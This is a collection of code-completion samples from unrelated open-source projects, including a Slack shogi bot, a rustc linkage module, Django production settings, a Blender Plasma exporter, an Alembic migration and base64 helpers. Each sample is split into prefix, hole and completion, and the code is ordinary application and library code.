<|file_name|>incompatibleExports2.ts<|end_file_name|><|fim▁begin|><|fim▁hole|>declare module "foo" { export interface x { a: string } interface y { a: Date } export = y; }<|fim▁end|>
<|file_name|>shogi.py<|end_file_name|><|fim▁begin|>import re import functools from slackbot.bot import respond_to from app.modules.shogi_input import ShogiInput, UserDifferentException, KomaCannotMoveException from app.modules.shogi_output import ShogiOutput from app.slack_utils.user import User from app.helper import channel_info, should_exist_shogi @respond_to('start with <?@?([\d\w_-]+)>?') @channel_info def start_shogi(channel, message, opponent_name): slacker = message._client.webapi user = User(slacker) opponent_id = user.username_to_id(opponent_name) if opponent_id is None: # In case of mention. In mention, slack transform username to userid # like @username to <@UOIFJ83F> opponent_id = opponent_name if not user.user_in_channel(opponent_id, channel.channel_id): message.reply("Error, sorry. Opponent is not found in this channel") return shogi = ShogiInput.init(channel_id=channel.channel_id, users=[{ "id": channel.own_id, "name": user.id_to_username(channel.own_id), }, { "id": opponent_id, "name": user.id_to_username(opponent_id), }]) if shogi is None: message.reply("Shogi started already by a user. Sorry.\nIf you want to quit shogi which already exists, please say this command `resign`") else: message.reply("Shogi started: " + shogi.id) board = ShogiInput.get_shogi_board(channel.channel_id) board_str = ShogiOutput.make_board_emoji(board) message.send(board_str) koma_names = [ "歩兵?", "と金?", "成?香車?", "成?桂馬?", "成?銀将?", "金将?", "角行?", "馬", "飛車?", "龍", "王将?", "玉将?", ] koma_names_string_regex = "|".join(koma_names) @respond_to("^([一二三四五六七八九123456789123456789]{2})?(同)?(" + koma_names_string_regex + ")([上右下左引寄直打]{1,2})?つ?(成)?") @channel_info @should_exist_shogi def koma_move(channel, message, position, dou, koma, sub_position=None, promote=None): movement_str = "".join( [x for x in [position, dou, koma, sub_position, promote] if x is not None]) try: ShogiInput.move(movement_str, channel.channel_id, channel.own_id) except UserDifferentException: message.reply("You cannot move this because *it's not your turn*") except KomaCannotMoveException: message.reply("You cannot move this with your message *{}*".format(movement_str)) finally: board = ShogiInput.get_shogi_board(channel.channel_id) board_str = ShogiOutput.make_board_emoji(board) message.send(board_str) @respond_to("set (all) mode") @channel_info @should_exist_shogi def set_mode(channel, message, arg): if arg == "all": ShogiInput.setAllMode(channel.channel_id) message.reply("Done! All member can move now!") @respond_to("今?.*の?.*状態.*を?教.*え?て?") @respond_to("now") @respond_to("局面.*") @respond_to("board") @channel_info @should_exist_shogi def board_info(channel, message): board = ShogiInput.get_shogi_board(channel.channel_id) board_str = ShogiOutput.make_board_emoji(board) message.send(board_str) @respond_to(".*降参.*") @respond_to(".*resign.*") @respond_to(".*負けました.*") @respond_to(".*まけました.*") @respond_to(".*まいりました.*") @respond_to(".*参りました.*") @respond_to(".*ありません.*") @channel_info @should_exist_shogi def resign(channel, message): message.send("最終局面") board = ShogiInput.get_shogi_board(channel.channel_id) board_str = ShogiOutput.make_board_emoji(board) message.send(board_str) ShogiInput.clear(channel.channel_id) @respond_to("待った") @channel_info @should_exist_shogi def matta(channel, message): try: ShogiInput.matta(channel.channel_id, channel.own_id) message.send("mattaed") except UserDifferentException: message.reply("You cannot matta because *it's not your turn*") except KomaCannotMoveException: message.reply("You cannot matta because koma not moved") finally: board = ShogiInput.get_shogi_board(channel.channel_id) board_str = ShogiOutput.make_board_emoji(board) message.send(board_str) @respond_to(".*ひふみん[eye, アイ, あい]?") @respond_to(".*反転.*") @channel_info @should_exist_shogi def hifumin(channel, message): board = ShogiInput.get_shogi_board(channel.channel_id)<|fim▁hole|><|fim▁end|>
board_str = ShogiOutput.make_board_emoji_reverse(board) message.send(board_str)
<|file_name|>karma.conf.js<|end_file_name|><|fim▁begin|>// Karma configuration file, see link for more information // https://karma-runner.github.io/1.0/config/configuration-file.html module.exports = function (config) { config.set({ basePath: '', frameworks: ['jasmine', '@angular-devkit/build-angular'], plugins: [ 'karma-jasmine', 'karma-chrome-launcher',<|fim▁hole|> ], client: { clearContext: false // leave Jasmine Spec Runner output visible in browser }, reporters: ['spec'], port: 9876, colors: true, logLevel: config.LOG_INFO, autoWatch: true, browsers: ['Chrome'], singleRun: false }); };<|fim▁end|>
'karma-spec-reporter', '@angular-devkit/build-angular/plugins/karma',
<|file_name|>KarisikSayma.java<|end_file_name|><|fim▁begin|>package Thread; /** * Created by cnkaptan on 5/8/15. */ public class KarisikSayma {<|fim▁hole|> public static void main(String[] args){ ThreadTest thrd = new ThreadTest("Thread"); Thread runnableThread = new Thread(new RunnableTest("Runnable")); thrd.start(); runnableThread.start(); } } class RunnableTest implements Runnable{ String name; public RunnableTest(String name){ this.name = name; } @Override public void run() { for (int i = 0; i < 21 ; i++){ System.out.println(name+"\t"+i); } } } class ThreadTest extends Thread{ String name; public ThreadTest(String name){ this.name = name; } @Override public void run() { for (int i = 0; i < 21 ; i++){ System.out.println(this.getName()+"\t"+i); } } }<|fim▁end|>
<|file_name|>AndroidfilehostCom.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -* # # Test links: # https://www.androidfilehost.com/?fid=95916177934518197 import re from module.plugins.internal.SimpleHoster import SimpleHoster class AndroidfilehostCom(SimpleHoster): __name__ = "AndroidfilehostCom" __type__ = "hoster" __version__ = "0.05" __status__ = "testing" __pattern__ = r'https?://(?:www\.)?androidfilehost\.com/\?fid=\d+' __config__ = [("activated" , "bool", "Activated" , True), ("use_premium" , "bool", "Use premium account if available" , True), ("fallback" , "bool", "Fallback to free download if premium fails" , True), ("chk_filesize", "bool", "Check file size" , True), ("max_wait" , "int" , "Reconnect if waiting time is greater than minutes", 10 )] __description__ = """Androidfilehost.com hoster plugin""" __license__ = "GPLv3" __authors__ = [("zapp-brannigan", "[email protected]")] NAME_PATTERN = r'<br />(?P<N>.*?)</h1>' SIZE_PATTERN = r'<h4>size</h4>\s*<p>(?P<S>[\d.,]+)(?P<U>[\w^_]+)</p>' HASHSUM_PATTERN = r'<h4>(?P<H>.*?)</h4>\s*<p><code>(?P<D>.*?)</code></p>' OFFLINE_PATTERN = r'404 not found' WAIT_PATTERN = r'users must wait <strong>(\d+) secs' def setup(self): self.multiDL = True self.resume_download = True self.chunk_limit = 1 def handle_free(self, pyfile): wait = re.search(self.WAIT_PATTERN, self.data) self.log_debug("Waiting time: %s seconds" % wait.group(1)) fid = re.search(r'id="fid" value="(\d+)" />', self.data).group(1) self.log_debug("FID: %s" % fid) html = self.load("https://www.androidfilehost.com/libs/otf/mirrors.otf.php", post={'submit': 'submit', 'action': 'getdownloadmirrors', 'fid' : fid})<|fim▁hole|> self.link = re.findall('"url":"(.*?)"', html)[0].replace("\\", "") mirror_host = self.link.split("/")[2] self.log_debug("Mirror Host: %s" % mirror_host) html = self.load("https://www.androidfilehost.com/libs/otf/stats.otf.php", get={'fid' : fid, 'w' : 'download', 'mirror': mirror_host})<|fim▁end|>
<|file_name|>dependency_format.rs<|end_file_name|><|fim▁begin|>// Copyright 2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. //! Resolution of mixing rlibs and dylibs<|fim▁hole|>//! dependencies. The linking phase must guarantee, however, that a library only //! show up once in the object file. For example, it is illegal for library A to //! be statically linked to B and C in separate dylibs, and then link B and C //! into a crate D (because library A appears twice). //! //! The job of this module is to calculate what format each upstream crate //! should be used when linking each output type requested in this session. This //! generally follows this set of rules: //! //! 1. Each library must appear exactly once in the output. //! 2. Each rlib contains only one library (it's just an object file) //! 3. Each dylib can contain more than one library (due to static linking), //! and can also bring in many dynamic dependencies. //! //! With these constraints in mind, it's generally a very difficult problem to //! find a solution that's not "all rlibs" or "all dylibs". I have suspicions //! that NP-ness may come into the picture here... //! //! The current selection algorithm below looks mostly similar to: //! //! 1. If static linking is required, then require all upstream dependencies //! to be available as rlibs. If not, generate an error. //! 2. If static linking is requested (generating an executable), then //! attempt to use all upstream dependencies as rlibs. If any are not //! found, bail out and continue to step 3. //! 3. Static linking has failed, at least one library must be dynamically //! linked. Apply a heuristic by greedily maximizing the number of //! dynamically linked libraries. //! 4. Each upstream dependency available as a dynamic library is //! registered. The dependencies all propagate, adding to a map. It is //! possible for a dylib to add a static library as a dependency, but it //! is illegal for two dylibs to add the same static library as a //! dependency. The same dylib can be added twice. Additionally, it is //! illegal to add a static dependency when it was previously found as a //! dylib (and vice versa) //! 5. After all dynamic dependencies have been traversed, re-traverse the //! remaining dependencies and add them statically (if they haven't been //! added already). //! //! While not perfect, this algorithm should help support use-cases such as leaf //! dependencies being static while the larger tree of inner dependencies are //! all dynamic. This isn't currently very well battle tested, so it will likely //! fall short in some use cases. //! //! Currently, there is no way to specify the preference of linkage with a //! particular library (other than a global dynamic/static switch). //! Additionally, the algorithm is geared towards finding *any* solution rather //! than finding a number of solutions (there are normally quite a few). use std::collections::HashMap; use syntax::ast; use driver::session; use driver::config; use metadata::cstore; use metadata::csearch; use middle::ty; /// A list of dependencies for a certain crate type. /// /// The length of this vector is the same as the number of external crates used. /// The value is None if the crate does not need to be linked (it was found /// statically in another dylib), or Some(kind) if it needs to be linked as /// `kind` (either static or dynamic). pub type DependencyList = Vec<Option<cstore::LinkagePreference>>; /// A mapping of all required dependencies for a particular flavor of output. /// /// This is local to the tcx, and is generally relevant to one session. pub type Dependencies = HashMap<config::CrateType, DependencyList>; pub fn calculate(tcx: &ty::ctxt) { let mut fmts = tcx.dependency_formats.borrow_mut(); for &ty in tcx.sess.crate_types.borrow().iter() { fmts.insert(ty, calculate_type(&tcx.sess, ty)); } tcx.sess.abort_if_errors(); } fn calculate_type(sess: &session::Session, ty: config::CrateType) -> DependencyList { match ty { // If the global prefer_dynamic switch is turned off, first attempt // static linkage (this can fail). config::CrateTypeExecutable if !sess.opts.cg.prefer_dynamic => { match attempt_static(sess) { Some(v) => return v, None => {} } } // No linkage happens with rlibs, we just needed the metadata (which we // got long ago), so don't bother with anything. config::CrateTypeRlib => return Vec::new(), // Staticlibs must have all static dependencies. If any fail to be // found, we generate some nice pretty errors. config::CrateTypeStaticlib => { match attempt_static(sess) { Some(v) => return v, None => {} } sess.cstore.iter_crate_data(|cnum, data| { let src = sess.cstore.get_used_crate_source(cnum).unwrap(); if src.rlib.is_some() { return } sess.err(format!("dependency `{}` not found in rlib format", data.name).as_slice()); }); return Vec::new(); } // Everything else falls through below config::CrateTypeExecutable | config::CrateTypeDylib => {}, } let mut formats = HashMap::new(); // Sweep all crates for found dylibs. Add all dylibs, as well as their // dependencies, ensuring there are no conflicts. The only valid case for a // dependency to be relied upon twice is for both cases to rely on a dylib. sess.cstore.iter_crate_data(|cnum, data| { let src = sess.cstore.get_used_crate_source(cnum).unwrap(); if src.dylib.is_some() { add_library(sess, cnum, cstore::RequireDynamic, &mut formats); debug!("adding dylib: {}", data.name); let deps = csearch::get_dylib_dependency_formats(&sess.cstore, cnum); for &(depnum, style) in deps.iter() { add_library(sess, depnum, style, &mut formats); debug!("adding {}: {}", style, sess.cstore.get_crate_data(depnum).name.clone()); } } }); // Collect what we've got so far in the return vector. let mut ret = range(1, sess.cstore.next_crate_num()).map(|i| { match formats.find(&i).map(|v| *v) { v @ Some(cstore::RequireDynamic) => v, _ => None, } }).collect::<Vec<_>>(); // Run through the dependency list again, and add any missing libraries as // static libraries. sess.cstore.iter_crate_data(|cnum, data| { let src = sess.cstore.get_used_crate_source(cnum).unwrap(); if src.dylib.is_none() && !formats.contains_key(&cnum) { assert!(src.rlib.is_some()); add_library(sess, cnum, cstore::RequireStatic, &mut formats); *ret.get_mut(cnum as uint - 1) = Some(cstore::RequireStatic); debug!("adding staticlib: {}", data.name); } }); // When dylib B links to dylib A, then when using B we must also link to A. // It could be the case, however, that the rlib for A is present (hence we // found metadata), but the dylib for A has since been removed. // // For situations like this, we perform one last pass over the dependencies, // making sure that everything is available in the requested format. for (cnum, kind) in ret.iter().enumerate() { let cnum = cnum as ast::CrateNum; let src = sess.cstore.get_used_crate_source(cnum + 1).unwrap(); match *kind { None => continue, Some(cstore::RequireStatic) if src.rlib.is_some() => continue, Some(cstore::RequireDynamic) if src.dylib.is_some() => continue, Some(kind) => { let data = sess.cstore.get_crate_data(cnum + 1); sess.err(format!("crate `{}` required to be available in {}, \ but it was not available in this form", data.name, match kind { cstore::RequireStatic => "rlib", cstore::RequireDynamic => "dylib", }).as_slice()); } } } return ret; } fn add_library(sess: &session::Session, cnum: ast::CrateNum, link: cstore::LinkagePreference, m: &mut HashMap<ast::CrateNum, cstore::LinkagePreference>) { match m.find(&cnum) { Some(&link2) => { // If the linkages differ, then we'd have two copies of the library // if we continued linking. If the linkages are both static, then we // would also have two copies of the library (static from two // different locations). // // This error is probably a little obscure, but I imagine that it // can be refined over time. if link2 != link || link == cstore::RequireStatic { let data = sess.cstore.get_crate_data(cnum); sess.err(format!("cannot satisfy dependencies so `{}` only \ shows up once", data.name).as_slice()); sess.note("having upstream crates all available in one format \ will likely make this go away"); } } None => { m.insert(cnum, link); } } } fn attempt_static(sess: &session::Session) -> Option<DependencyList> { let crates = sess.cstore.get_used_crates(cstore::RequireStatic); if crates.iter().all(|&(_, ref p)| p.is_some()) { Some(crates.into_iter().map(|_| Some(cstore::RequireStatic)).collect()) } else { None } }<|fim▁end|>
//! //! When producing a final artifact, such as a dynamic library, the compiler has //! a choice between linking an rlib or linking a dylib of all upstream
<|file_name|>prod.py<|end_file_name|><|fim▁begin|>import os from .base import * # NOQA import dj_database_url DEBUG = False TEMPLATE_DEBUG = DEBUG ADMINS = ( ) DATABASES = {'default': dj_database_url.config()}<|fim▁hole|> LOGGING = { 'version': 1, 'disable_existing_loggers': True, 'filters': { 'require_debug_false': { '()': 'django.utils.log.RequireDebugFalse' } }, 'formatters': { 'verbose': { 'format': '%(levelname)s %(asctime)s %(module)s ' '%(process)d %(thread)d %(message)s' }, 'simple': { 'format': '%(levelname)s %(message)s' }, }, 'handlers': { 'null': { 'level': 'DEBUG', 'class': 'django.utils.log.NullHandler', }, 'console': { 'level': 'DEBUG', 'class': 'logging.StreamHandler', 'formatter': 'verbose' }, 'mail_admins': { 'level': 'ERROR', 'filters': ['require_debug_false'], 'class': 'django.utils.log.AdminEmailHandler' } }, 'loggers': { 'django': { 'handlers': ['console', 'mail_admins'], 'level': 'DEBUG', 'propagate': True, }, 'django.request': { 'handlers': ['console', 'mail_admins'], 'level': 'ERROR', 'propagate': False, }, 'django.db.backends': { 'handlers': ['console', 'mail_admins'], 'level': 'INFO', 'propagate': False, }, # Catch All Logger -- Captures any other logging '': { 'handlers': ['console', 'mail_admins'], 'level': 'DEBUG', 'propagate': True, } } } # Honor the 'X-Forwarded-Proto' header for request.is_secure() SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https') # Allow all host headers ALLOWED_HOSTS = ['*'] ########## EMAIL CONFIGURATION # See: https://docs.djangoproject.com/en/1.3/ref/settings/#email-backend EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend' # See: https://docs.djangoproject.com/en/1.3/ref/settings/#email-host EMAIL_HOST = os.environ.get('MAILGUN_SMTP_SERVER', None) # See: https://docs.djangoproject.com/en/1.3/ref/settings/#email-host-password EMAIL_HOST_PASSWORD = os.environ.get('MAILGUN_SMTP_PASSWORD', None) # See: https://docs.djangoproject.com/en/1.3/ref/settings/#email-host-user EMAIL_HOST_USER = os.environ.get('MAILGUN_SMTP_LOGIN', None) # See: https://docs.djangoproject.com/en/1.3/ref/settings/#email-port EMAIL_PORT = os.environ.get('MAILGUN_SMTP_PORT', None ) # See: https://docs.djangoproject.com/en/1.3/ref/settings/#email-subject-prefix EMAIL_SUBJECT_PREFIX = '[Scorinator] ' # See: https://docs.djangoproject.com/en/1.3/ref/settings/#email-use-tls EMAIL_USE_TLS = True # See: https://docs.djangoproject.com/en/1.3/ref/settings/#server-email SERVER_EMAIL = EMAIL_HOST_USER ########## END EMAIL CONFIGURATION<|fim▁end|>
<|file_name|>pgn.component.ts<|end_file_name|><|fim▁begin|>import { Component, Output, EventEmitter } from '@angular/core'; import { ChessService } from '../shared'; import { PgnLineComponent } from '../pgn-line'; @Component({ selector: 'app-pgn', templateUrl: 'pgn.component.html', styleUrls: ['pgn.component.scss'], directives: [PgnLineComponent] }) export class PgnComponent { @Output() updatePosition: EventEmitter<any> = new EventEmitter(); constructor(private chessService: ChessService) {} onUpdatePosition() { this.updatePosition.emit(null); } getMainline() {<|fim▁hole|> return this.chessService.chess.currentGame.boardVariations[0]; } getBasePosition() { return []; } }<|fim▁end|>
<|file_name|>tools_test.py<|end_file_name|><|fim▁begin|>from unidown.tools import unlink_dir_rec <|fim▁hole|> no_folder = tmp_path.joinpath("./donotexist/") assert not no_folder.exists() unlink_dir_rec(no_folder) assert not no_folder.exists() def test_recursive(self, tmp_path): for number in range(1, 4): with tmp_path.joinpath(str(number)).open('w'): pass sub_folder = tmp_path.joinpath("sub") sub_folder.mkdir(parents=True, exist_ok=True) for number in range(1, 4): with sub_folder.joinpath(str(number)).open('w'): pass tmp_path.joinpath("sub2").mkdir() unlink_dir_rec(tmp_path) assert not tmp_path.exists()<|fim▁end|>
class TestDeleteDirRec: def test_non_existence(self, tmp_path):
<|file_name|>htmllielement.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ use dom::bindings::codegen::HTMLLIElementBinding; use dom::bindings::utils::{DOMString, ErrorResult}; use dom::document::AbstractDocument; use dom::element::HTMLLIElementTypeId; use dom::htmlelement::HTMLElement; use dom::node::{AbstractNode, Node}; pub struct HTMLLIElement { htmlelement: HTMLElement, } impl HTMLLIElement { pub fn new_inherited(localName: ~str, document: AbstractDocument) -> HTMLLIElement { HTMLLIElement { htmlelement: HTMLElement::new_inherited(HTMLLIElementTypeId, localName, document) } } pub fn new(localName: ~str, document: AbstractDocument) -> AbstractNode { let element = HTMLLIElement::new_inherited(localName, document); Node::reflect_node(@mut element, document, HTMLLIElementBinding::Wrap) } } impl HTMLLIElement { pub fn Value(&self) -> i32 { 0 } pub fn SetValue(&mut self, _value: i32) -> ErrorResult {<|fim▁hole|> Ok(()) } pub fn Type(&self) -> DOMString { ~"" } pub fn SetType(&mut self, _type: DOMString) -> ErrorResult { Ok(()) } }<|fim▁end|>
<|file_name|>logic.py<|end_file_name|><|fim▁begin|># This file is part of Korman. # # Korman is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Korman is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Korman. If not, see <http://www.gnu.org/licenses/>. import bpy from bpy.props import * from PyHSPlasma import * from .base import PlasmaModifierProperties from ..prop_world import game_versions from ...exporter import ExportError from ... import idprops class PlasmaVersionedNodeTree(idprops.IDPropMixin, bpy.types.PropertyGroup): name = StringProperty(name="Name") version = EnumProperty(name="Version", description="Plasma versions this node tree exports under", items=game_versions, options={"ENUM_FLAG"}, default=set(list(zip(*game_versions))[0])) node_tree = PointerProperty(name="Node Tree", description="Node Tree to export", type=bpy.types.NodeTree) node_name = StringProperty(name="Node Ref", description="Attach a reference to this node") @classmethod def _idprop_mapping(cls): return {"node_tree": "node_tree_name"} def _idprop_sources(self): return {"node_tree_name": bpy.data.node_groups} class PlasmaAdvancedLogic(PlasmaModifierProperties): pl_id = "advanced_logic" bl_category = "Logic" bl_label = "Advanced" bl_description = "Plasma Logic Nodes" bl_icon = "NODETREE" logic_groups = CollectionProperty(type=PlasmaVersionedNodeTree) active_group_index = IntProperty(options={"HIDDEN"}) def export(self, exporter, bo, so): version = exporter.mgr.getVer() for i in self.logic_groups: our_versions = [globals()[j] for j in i.version] if version in our_versions: if i.node_tree is None: raise ExportError("'{}': Advanced Logic is missing a node tree for '{}'".format(bo.name, i.version)) # If node_name is defined, then we're only adding a reference. We will make sure that # the entire node tree is exported once before the post_export step, however. if i.node_name:<|fim▁hole|> # We are going to assume get_key will do the adding correctly. Single modifiers # should fetch the appropriate SceneObject before doing anything, so this will # be a no-op in that case. Multi modifiers should accept any SceneObject, however node.get_key(exporter, so) else: exporter.node_trees_exported.add(i.node_tree.name) i.node_tree.export(exporter, bo, so) def harvest_actors(self): actors = set() for i in self.logic_groups: actors.update(i.node_tree.harvest_actors()) return actors class PlasmaSpawnPoint(PlasmaModifierProperties): pl_id = "spawnpoint" bl_category = "Logic" bl_label = "Spawn Point" bl_description = "Point at which avatars link into the Age" def export(self, exporter, bo, so): # Not much to this modifier... It's basically a flag that tells the engine, "hey, this is a # place the avatar can show up." Nice to have a simple one to get started with. spawn = exporter.mgr.add_object(pl=plSpawnModifier, so=so, name=self.key_name) @property def requires_actor(self): return True class PlasmaMaintainersMarker(PlasmaModifierProperties): pl_id = "maintainersmarker" bl_category = "Logic" bl_label = "Maintainer's Marker" bl_description = "Designates an object as the D'ni coordinate origin point of the Age." bl_icon = "OUTLINER_DATA_EMPTY" calibration = EnumProperty(name="Calibration", description="State of repair for the Marker", items=[ ("kBroken", "Broken", "A marker which reports scrambled coordinates to the KI."), ("kRepaired", "Repaired", "A marker which reports blank coordinates to the KI."), ("kCalibrated", "Calibrated", "A marker which reports accurate coordinates to the KI.") ]) def export(self, exporter, bo, so): maintmark = exporter.mgr.add_object(pl=plMaintainersMarkerModifier, so=so, name=self.key_name) maintmark.calibration = getattr(plMaintainersMarkerModifier, self.calibration) @property def requires_actor(self): return True<|fim▁end|>
exporter.want_node_trees[i.node_tree.name] = (bo, so) node = i.node_tree.nodes.get(i.node_name, None) if node is None: raise ExportError("Node '{}' does not exist in '{}'".format(i.node_name, i.node_tree.name))
<|file_name|>rust_base64.rs<|end_file_name|><|fim▁begin|>use indy_api_types::errors::prelude::*; use failure::ResultExt; pub fn encode(doc: &[u8]) -> String { base64::encode(doc) } pub fn decode(doc: &str) -> Result<Vec<u8>, IndyError> { base64::decode(doc)<|fim▁hole|> .map_err(|err| err.into()) } pub fn encode_urlsafe(doc: &[u8]) -> String { base64::encode_config(doc, base64::URL_SAFE) //TODO switch to URL_SAFE_NO_PAD } pub fn decode_urlsafe(doc: &str) -> Result<Vec<u8>, IndyError> { base64::decode_config(doc, base64::URL_SAFE_NO_PAD) .context("Invalid base64URL_SAFE sequence") .context(IndyErrorKind::InvalidStructure) .map_err(|err| err.into()) } #[cfg(test)] mod tests { use super::*; #[test] fn encode_works() { let result = encode(&[1, 2, 3]); assert_eq!("AQID", &result); } #[test] fn decode_works() { let result = decode("AQID"); assert!(result.is_ok(), "Got error"); assert_eq!(&[1, 2, 3], &result.unwrap()[..]); } #[test] fn encode_urlsafe_works() { let result = encode_urlsafe(&[1, 2, 3]); assert_eq!("AQID", &result); } #[test] fn decode_urlsafe_works() { let result = decode_urlsafe("AQID"); assert!(result.is_ok(), "Got error"); assert_eq!(&[1, 2, 3], &result.unwrap()[..]); } #[test] // aries-396 fn encode_base64_urlsafe_and_urlsafe_no_pad_compatible() { let data = "Hello World"; { let encoded = base64::encode_config(data, base64::URL_SAFE); let decoded_data = base64::decode_config(&encoded, base64::URL_SAFE_NO_PAD).unwrap(); assert_eq!(data.as_bytes().to_vec(), decoded_data); } { let encoded = base64::encode_config(data, base64::URL_SAFE_NO_PAD); let decoded_data = base64::decode_config(&encoded, base64::URL_SAFE).unwrap(); assert_eq!(data.as_bytes().to_vec(), decoded_data); } } }<|fim▁end|>
.context("Invalid base64 sequence") .context(IndyErrorKind::InvalidStructure)
<|file_name|>CodeConverter.java<|end_file_name|><|fim▁begin|>package me.killje.servercaster.core.converter; import java.util.ArrayList; import java.util.Collection; import java.util.HashMap;<|fim▁hole|>import me.killje.servercaster.core.ServerCaster; import mkremins.fanciful.FancyMessage; import org.bukkit.entity.Player; /** * * @author Patrick Beuks (killje) and Floris Huizinga (Flexo013) */ public class CodeConverter extends Converter { private static final Map<String, CodeAction> codes = new HashMap<>(); private final ArrayList<CodeAction> actionCode = new ArrayList<>(); private final ArrayList<CodeAction> emptyCodes = new ArrayList<>(); private boolean nextChar = false; private boolean inBracket = false; private final Collection<? extends Player> players; CodeConverter(FancyMessage fm, Collection<? extends Player> players) { super(fm); for (Map.Entry<String, CodeAction> entry : codes.entrySet()) { CodeAction codeAction = entry.getValue(); codeAction.setBuilders(fm, players); } this.players = players; } @Override boolean isEndChar(char c) { return c == ';'; } @Override Converter end() { nextChar = true; String savedString = getSavedString(); if (codes.containsKey(savedString.toLowerCase())) { CodeAction ca = codes.get(savedString.toLowerCase()); if (ca.hasArgumentsLeft()) { actionCode.add(ca); } else { emptyCodes.add(ca); } } else { ServerCaster.getInstance().getLogger().logp( Level.WARNING, this.getClass().getName(), "end()", "Unknown Action Code", new IllegalArgumentException("Code Action Unknown (" + savedString + ")")); } clearSavedString(); return this; } @Override Converter nextChar(char c) { if (fm == null) { throw new NullPointerException("FancyMessage not declared"); } if (inBracket) { if (actionCode.get(0).isEndChar(c)) { if (actionCode.get(0).isEnd(getSavedString())) { actionCode.remove(0); inBracket = false; } } addChar(c); return this; } if (nextChar) { if (c == '{') { if (actionCode.isEmpty()) { return new BracketConverter(fm, emptyCodes, players); } inBracket = true; return this; } else { nextChar = false; return this; } } else { return super.nextChar(c); } } public static void addCodeAction(CodeAction ca) { codes.put(ca.getCode(), ca); } public static void removeCodeAction(CodeAction ca) { codes.remove(ca.getCode()); } }<|fim▁end|>
import java.util.Map; import java.util.logging.Level;
<|file_name|>4623531fa2b_record_information_about_how_a_game_.py<|end_file_name|><|fim▁begin|>"""Record information about how a game finished. Revision ID: 4623531fa2b Revises: 9aec2a74d9 Create Date: 2016-04-16 12:27:45.788322 """ # revision identifiers, used by Alembic. revision = '4623531fa2b' down_revision = '9aec2a74d9' from alembic import op import sqlalchemy as sa import app.go as go # A kind of hybrid table that contains both the old/downgraded column # 'finished' as well as the upgraded column 'result' gamehelper = sa.Table( 'games', sa.MetaData(), sa.Column('id', sa.Integer, primary_key=True), sa.Column('result', sa.Enum('WBR', 'WBC', 'BBR', 'BBC', 'D', '')), sa.Column('finished', sa.Boolean), sa.Column('sgf', sa.Text) ) def upgrade(): with op.batch_alter_table('games', schema=None) as batch_op:<|fim▁hole|> connection.execute( gamehelper.update().where( gamehelper.c.id == game.id ).values(result=result) ) with op.batch_alter_table('games', schema=None) as batch_op: batch_op.drop_column('finished') ### end Alembic commands ### def downgrade(): connection = op.get_bind() with op.batch_alter_table('games', schema=None) as batch_op: batch_op.add_column(sa.Column('finished', sa.BOOLEAN(), server_default=sa.text("'0'"), autoincrement=False, nullable=True)) for game in connection.execute(gamehelper.select()): finished = game.result != "" connection.execute( gamehelper.update().where( gamehelper.c.id == game.id ).values(finished=finished)) with op.batch_alter_table('games', schema=None) as batch_op: batch_op.drop_column('result') ### end Alembic commands ###<|fim▁end|>
batch_op.add_column(sa.Column('result', sa.Enum('WBR', 'WBC', 'BBR', 'BBC', 'D', ''), nullable=True)) connection = op.get_bind() for game in connection.execute(gamehelper.select()): result = go.get_game_result(game.sgf).value
<|file_name|>spatial_graphs.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python #-*- coding:utf-8 -*- # # This file is part of the NNGT project to generate and analyze # neuronal networks and their activity. # Copyright (C) 2015-2019 Tanguy Fardet # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. ''' Spatial graphs generation and methods ''' <|fim▁hole|>import numpy as np import nngt from nngt.geometry import Shape # nngt.seed(0) # ---------------------------- # # Generate the spatial network # # ---------------------------- # ell = Shape.ellipse(radii=(3000., 5000.)) num_nodes = 1000 population = nngt.NeuralPop.uniform(num_nodes) g = nngt.generation.gaussian_degree( 100., 5., nodes=num_nodes, shape=ell, population=population) # -------------- # # Saving/loading # # -------------- # start = time.time() g.to_file('sp_graph.el') print('Saving in {} s.'.format(time.time() - start)) start = time.time() g2 = nngt.Graph.from_file('sp_graph.el') print('Loading in {} s.'.format(time.time() - start)) # check equality of shapes and populations print('Both networks have same area: {}.'.format( np.isclose(g2.shape.area, ell.area))) print('They also have the same boundaries: {}.'.format( np.all(np.isclose(g2.shape.bounds, ell.bounds)))) same_groups = np.all( [g2.population[k] == g.population[k] for k in g.population]) same_ids = np.all( [g2.population[k].ids == g.population[k].ids for k in g.population]) print('They also have the same population: {}.'.format(same_groups * same_ids)) # remove file os.remove('sp_graph.el') # ---- # # Plot # # ---- # if nngt.get_config('with_plot'): nngt.plot.draw_network(g2, decimate_connections=100, show=True)<|fim▁end|>
import os import time
